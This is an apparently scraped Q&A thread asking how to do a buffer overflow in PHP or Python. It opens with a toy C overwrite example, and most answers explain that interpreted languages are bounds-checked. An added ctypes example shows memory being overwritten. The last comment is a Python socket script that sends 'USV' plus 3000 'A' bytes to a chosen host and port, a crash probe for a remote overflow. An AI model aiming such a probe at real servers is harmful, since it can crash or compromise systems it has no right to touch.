How do I do a buffer overflow in PHP/Python?

Posted on 2024-08-17 18:52:31

Here is an example in C:

#include <stdio.h>
#include <string.h>

void bad() {
    printf("Oh shit really bad~!\r\n");
}

void foo() {
    char overme[4] = "WOW";
    *(int*)(overme+8) = (int)bad;
}

int main() {
   foo();
}

Comments (6)

掩耳倾听 2024-08-24 18:52:31

The fact that Python and PHP are interpreted, as suggested by others, isn't actually the point. The point is that almost all of the APIs and language semantics that they expose are heavily error-checked, making it impossible to have exploitable undefined behavior. Even if you compile the languages, it would still be impossible. This doesn't mean that you couldn't expose unsafe APIs that can do whatever. In fact, using Python's ctypes module, it should be possible to create a similar behavior, but significantly harder to do so by accident.
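
An added example (not part of the answer above or of the original thread) contrasting Python's bounds-checked writes with the unchecked `ctypes.memmove` path the answer alludes to. The `Frame` structure and its `neighbour` field are constructed for illustration; the oversized write stays inside the structure's own 8-byte allocation, so only the adjacent field is clobbered.

```python
import ctypes

class Frame(ctypes.Structure):
    # Constructed layout: a 4-byte buffer directly followed by a neighbour
    # field, standing in for whatever sits next to a C stack buffer.
    _fields_ = [("overme", ctypes.c_char * 4),
                ("neighbour", ctypes.c_uint32)]

def checked_writes():
    """Attempt the overflow through Python's normal, bounds-checked paths."""
    errors = []
    buf = bytearray(b"WOW\x00")
    try:
        buf[8] = 0x41                    # index past the end of a 4-byte buffer
    except IndexError as exc:
        errors.append(type(exc).__name__)
    frame = Frame(b"WOW", 0xCAFEBABE)
    try:
        frame.overme = b"A" * 8          # 8 bytes into a c_char * 4 field
    except ValueError as exc:
        errors.append(type(exc).__name__)
    # Both writes were rejected, so the neighbour is untouched.
    return errors, frame.neighbour

def unchecked_write():
    """The same 8-byte write through ctypes.memmove, which checks nothing."""
    frame = Frame(b"WOW", 0xCAFEBABE)
    # memmove only sees an address and a length; it has no idea that
    # 'overme' ends after 4 bytes, so bytes 4..7 land in 'neighbour'.
    ctypes.memmove(ctypes.addressof(frame), b"A" * 8, 8)
    return frame.overme, frame.neighbour

if __name__ == "__main__":
    errors, neighbour = checked_writes()
    print("checked paths raised:", errors, "neighbour = 0x%08X" % neighbour)
    overme, neighbour = unchecked_write()
    print("after memmove: overme =", overme, "neighbour = 0x%08X" % neighbour)
```
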

埋情葬爱 2024-08-24 18:52:31

As PHP is a scripting language and has no pointers and the string type is binary-safe such things won't work in PHP.

But why would you want to do such a thing?

(oh, there might be bugs in PHP resulting in a buffer overflow, but that's nothing that can be relied upon in any way and usually is fixed quite fast...)

紙鸢 2024-08-24 18:52:31

We're sorry: you've reached a weakness in Python. Unfortunately, it's by design, so little can be done about it. Perhaps you should stay with C.

As Martin v. Löwis said:

Python does not support buffer overflows, sorry.

PS Wow. It seems like a few months ago that I read that post, and yet it's been 7 years and a day.

眼眸里的那抹悲凉 2024-08-24 18:52:31

Doing something similar in PHP will not result in the same behavior.

PHP is interpreted and always checks whether or not the operation you are doing is valid. So you can't - for example - overrun a buffer.

空‖城人不在 2024-08-24 18:52:31

Because PHP, Python and every interpreted language first have to go through an interpreter, and you don't have full access to the memory, these kinds of languages will not let you play the kind of games in the code you posted.

欲拥i 2024-08-24 18:52:31

import sys
import socket

# Read the host (-S) and port (-p) from the command line.
for carg in sys.argv:
    if carg == "-S":
        argnum = sys.argv.index(carg)
        argnum += 1
        host = sys.argv[argnum]
    elif carg == "-p":
        argnum = sys.argv.index(carg)
        argnum += 1
        port = int(sys.argv[argnum])  # connect() needs an integer port

# 3000 "A" bytes, sent after the "USV" prefix.
buffer = b"\x41" * 3000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(b"USV" + buffer)
s.close()